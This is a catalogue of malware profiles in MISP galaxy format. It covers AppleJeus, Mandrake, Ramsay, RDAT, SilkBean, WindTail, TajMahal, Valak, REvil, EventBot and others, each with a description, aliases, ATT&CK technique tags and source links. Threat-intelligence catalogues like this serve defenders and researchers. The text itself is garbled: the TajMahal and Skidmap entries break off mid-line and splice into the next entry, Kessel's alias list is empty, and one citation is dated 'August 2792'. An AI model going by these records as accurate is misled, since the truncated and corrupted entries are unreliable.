- uses: `misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486"` with estimative-language:likelihood-probability="almost-certain"
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**AppleJeus - S0584**

[AppleJeus](https://attack.mitre.org/software/S0584) is a family of downloaders initially discovered in 2018 embedded within trojanized cryptocurrency applications. [AppleJeus](https://attack.mitre.org/software/S0584) has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032), targeting companies in the energy, finance, government, industry, technology, and telecommunications sectors, and several countries including the United States, United Kingdom, South Korea, Australia, Brazil, New Zealand, and Russia. [AppleJeus](https://attack.mitre.org/software/S0584) has been used to distribute the [FALLCHILL](https://attack.mitre.org/software/S0181) RAT. (Citation: CISA AppleJeus Feb 2021)

The tag is: *misp-galaxy:mitre-malware="AppleJeus - S0584"*

AppleJeus - S0584 is also known as:

- AppleJeus

AppleJeus - S0584 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Launchctl - T1569.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

Table 4861. Table References

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<td><a href="https://attack.mitre.org/software/S0584">https://attack.mitre.org/software/S0584</a></td>
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<tr>
<td><a href="https://us-cert.cisa.gov/ncas/alerts/aa21-048a">https://us-cert.cisa.gov/ncas/alerts/aa21-048a</a></td>
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</table>
Mandrake - S0485

[Mandrake](https://attack.mitre.org/software/S0485) is a sophisticated Android espionage platform that has been active in the wild since at least 2016. [Mandrake](https://attack.mitre.org/software/S0485) is very actively maintained, with sophisticated features and attacks that are executed with surgical precision.

[Mandrake](https://attack.mitre.org/software/S0485) has gone undetected for several years by providing legitimate, ad-free applications with social media and real reviews to back the apps. The malware is only activated when the operators issue a specific command.(Citation: Bitdefender Mandrake)

The tag is: `misp-galaxy:mitre-malware="Mandrake - S0485"`

Mandrake - S0485 is also known as:

- Mandrake
- oxide
- briar
- ricinus
- darkmatter

Mandrake - S0485 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Screen Capture - T1513"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1436" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1520" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Notifications - T1517" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Foreground Persistence - T1541" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Service - T1481" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1509" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

Table 4862. Table References

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<td><a href="https://attack.mitre.org/software/S0485">https://attack.mitre.org/software/S0485</a></td>
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</table>
Ramsay - S0458

[Ramsay](https://attack.mitre.org/software/S0458) is an information stealing malware framework designed to collect and exfiltrate sensitive documents, including from air-gapped systems. Researchers have identified overlaps between [Ramsay](https://attack.mitre.org/software/S0458) and the [Darkhotel](https://attack.mitre.org/groups/G0012)-associated Retro malware. (Citation: Eset Ramsay May 2020) (Citation: Antiy CERT Ramsay April 2020)

The tag is: `misp-galaxy:mitre-malware="Ramsay - S0458"`

Ramsay - S0458 is also known as:

- Ramsay

Ramsay - S0458 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Native API - T1106"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1546.010" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
Table 4863. Table References

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<td><a href="https://attack.mitre.org/software/S0458">https://attack.mitre.org/software/S0458</a></td>
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<td><a href="https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/">https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/</a></td>
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<tr>
<td><a href="https://www.programmersought.com/article/62493896999/">https://www.programmersought.com/article/62493896999/</a></td>
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**RDAT - S0495**

[RDAT](https://attack.mitre.org/software/S0495) is a backdoor used by the suspected Iranian threat group [OilRig](https://attack.mitre.org/groups/G0049). [RDAT](https://attack.mitre.org/software/S0495) was originally identified in 2017 and targeted companies in the telecommunications sector. (Citation: Unit42 RDAT July 2020)

The tag is: *misp-galaxy:mitre-malware="RDAT - S0495"*

RDAT - S0495 is also known as:

- RDAT
- RDAT

RDAT - S0495 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"*
- uses: *misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"*
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Non-Standard Encoding - T1132.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/">https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/</a></td>
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</tbody>
</table>

SilkBean - S0549

SilkBean([https://attack.mitre.org/software/S0549](https://attack.mitre.org/software/S0549)) is a piece of Android surveillanceware containing comprehensive remote access tool (RAT) functionality that has been used in targeting of the Uyghur ethnic group. (Citation: Lookout Uyghur Campaign)
The tag is: misp-galaxy:mitre-malware="SilkBean - S0549"

SilkBean - S0549 is also known as:

- SilkBean

SilkBean - S0549 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

Table 4865. Table References

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MechaFlounder - S0459

[MechaFlounder](https://attack.mitre.org/software/S0459) is a python-based remote access tool (RAT) that has been used by [APT39](https://attack.mitre.org/groups/G0087). The payload uses a combination of actor developed code and code snippets freely available online in development communities.(Citation: Unit 42 MechaFlounder March 2019)

The tag is: *misp-galaxy:mitre-malware*="MechaFlounder - S0459"

MechaFlounder - S0459 is also known as:

- MechaFlounder

MechaFlounder - S0459 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern*="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern*="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern*="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/">https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/</a></td>
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</table>

WindTail - S0466

[WindTail](https://attack.mitre.org/software/S0466) is a macOS surveillance implant used by [Windshift](https://attack.mitre.org/groups/G0112). [WindTail](https://attack.mitre.org/software/S0466) shares code similarities with Hack Back aka KitM OSX.(Citation: SANS Windshift August 2792)
The tag is: misp-galaxy:mitre-malware="WindTail - S0466"

WindTail - S0466 is also known as:

- WindTail

WindTail - S0466 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Invalid Code Signature - T1036.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 4867. Table References

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TajMahal - S0467

[TajMahal](https://attack.mitre.org/software/S0467) is a multifunctional spying framework that has been in use since at least 2014. [TajMahal](https://attack.mitre.org/software/S0467) is comprised of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins. (Citation: Kaspersky TajMahal April 2019)

The tag is: *misp-galaxy:mitre-malware="TajMahal - S0467"*

TajMahal - S0467 is also known as:

- TajMahal

TajMahal - S0467 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-
Valak - S0476

[Valak](https://attack.mitre.org/software/S0476) is a multi-stage modular malware that can function as a standalone information stealer or downloader, first observed in 2019 targeting enterprises in the US and Germany.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)

The tag is: `misp-galaxy:mitre-malware="Valak - S0476"`

Valak - S0476 is also known as:

- Valak

Valak - S0476 has relationships with:
• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"

Table 4869. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0476">https://attack.mitre.org/software/S0476</a></td>
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<tr>
<td><a href="https://www.cybereason.com/blog/valak-more-than-meets-the-eye">https://www.cybereason.com/blog/valak-more-than-meets-the-eye</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/valak-evolution/">https://unit42.paloaltonetworks.com/valak-evolution/</a></td>
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</tbody>
</table>

**Bonadan - S0486**

[Bonadan](https://attack.mitre.org/software/S0486) is a malicious version of OpenSSH which acts as a custom backdoor. [Bonadan](https://attack.mitre.org/software/S0486) has been active since at least 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.(Citation: ESET ForSSHe December 2018)

The tag is: misp-galaxy:mitre-malware="Bonadan - S0486"
Bonadan - S0486 is also known as:

- Bonadan

Bonadan - S0486 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554" with estimative-language:likelihood-probability="almost-certain"

---

**Skidmap - S0468**

[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit used for cryptocurrency mining. (Citation: Trend Micro Skidmap)

The tag is: *misp-galaxy:mitre-malware="Skidmap - S0468"*

Skidmap - S0468 is also known as:

- Skidmap

Skidmap - S0468 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-
Table 4871. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0468">https://attack.mitre.org/software/S0468</a></td>
</tr>
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</table>
**ABK - S0469**

[ABK](https://attack.mitre.org/software/S0469) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: `misp-galaxy:mitre-malware="ABK - S0469"`

ABK - S0469 is also known as:

- ABK

ABK - S0469 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0469">https://attack.mitre.org/software/S0469</a></td>
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</table>

**REvil - S0496**

[REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496) is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)

The tag is: `misp-galaxy:mitre-malware="REvil - S0496"`
REvil - S0496 is also known as:

- REvil
- Sodin
- Sodinokibi

REvil - S0496 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with
estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"


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<td><a href="https://attack.mitre.org/software/S0496">https://attack.mitre.org/software/S0496</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/revil-sodinokibi-ransomware">https://www.secureworks.com/research/revil-sodinokibi-ransomware</a></td>
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<td><a href="https://www.group-ib.com/whitepapers/ransomware-uncovered.html">https://www.group-ib.com/whitepapers/ransomware-uncovered.html</a></td>
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<td><a href="https://securelist.com/sodin-ransomware/91473/">https://securelist.com/sodin-ransomware/91473/</a></td>
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</tbody>
</table>
Goopy - S0477

[Goopy](https://attack.mitre.org/software/S0477) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050) and shares several similarities to another backdoor used by the group ([Denis](https://attack.mitre.org/software/S0354)). [Goopy](https://attack.mitre.org/software/S0477) is named for its impersonation of the legitimate Google Updater executable. (Citation: Cybereason Cobalt Kitty 2017)

The tag is: misp-galaxy:mitre-malware="Goopy - S0477"

Goopy - S0477 is also known as:

- Goopy

Goopy - S0477 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
EventBot - S0478

[EventBot](https://attack.mitre.org/software/S0478) is an Android banking trojan and information stealer that abuses Android's accessibility service to steal data from various applications. [EventBot](https://attack.mitre.org/software/S0478) was designed to target over 200 different banking and financial applications, the majority of which are European bank and cryptocurrency exchange applications.

The tag is: `misp-galaxy:mitre-malware="EventBot - S0478"`

EventBot - S0478 is also known as:

- EventBot

EventBot - S0478 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
Kessel - S0487

[Kessel](https://attack.mitre.org/software/S0487) is an advanced version of OpenSSH which acts as a custom backdoor, mainly acting to steal credentials and function as a bot. [Kessel](https://attack.mitre.org/software/S0487) has been active since its C2 domain began resolving in August 2018.(Citation: ESET ForSSHe December 2018)

The tag is: misp-galaxy:mitre-malware="Kessel - S0487"

Kessel - S0487 is also known as:
Kessel - S0487 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"
